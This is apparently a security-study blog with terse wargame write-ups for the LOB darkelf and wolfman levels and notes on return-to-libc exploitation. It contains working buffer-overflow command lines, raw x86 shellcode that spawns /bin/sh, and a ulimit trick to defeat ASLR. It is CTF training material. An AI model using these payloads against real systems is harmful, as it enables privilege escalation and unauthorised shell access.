𝒃𝒆𝒂𝒖𝒕𝒚 𝒊𝒏𝒕𝒆𝒍𝒍𝒊𝒈𝒆𝒏𝒕
LOB darkelf
Wargame/CTF(Capture The Flag) 2015. 9. 15. 05:28

Opening the source, it is similar to the previous problem, but it checks the length. It checks the length of the first argument, and you can see that it exits if it is longer than 48 characters. For now, proceed the same way as before, and when writing the payload: ./darkelf $(python -c 'print "\x90"*40+"AAAA"+"\xcc\xfb\xff\xbf"')

LOB wolfman
Wargame/CTF(Capture The Flag) 2015. 9. 15. 05:09

Solving the problem again, ta-da, it is the same pattern as the previous problem. ./wolfman $(python -c 'print "\x90"*40+"AAAA(dummy)"+"\xec\xfb\xff\xbf"(address value)+"\x90"*180+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"')

system 2
Security Study/System 2015. 9. 13. 03:19

Input to a blocking function inside gdb r

system day 1
Security Study/System 2015. 9. 12. 08:54

buf[248] + sfp[4] + ret
ulimit -s unlimited // increase the stack size to unlimited so that ASLR is not applied
system, execve - take what is located at ebp+8 as the argument
buf[248] + sfp[4] + manipulated (system) + AAAA + /bin/sh - system("/bin/sh")
b main
r 1
p system - get the address of system
p exit - get exit
find &system,+9999999,"/bin/sh" - get the address of /bin/sh
./filename $(python -c 'print "A"*buffer+sfp + system + exit + /bin/sh
strcpy(bss,\x80asda)
strcpy(bss,"b")
./filename buf+sfp..
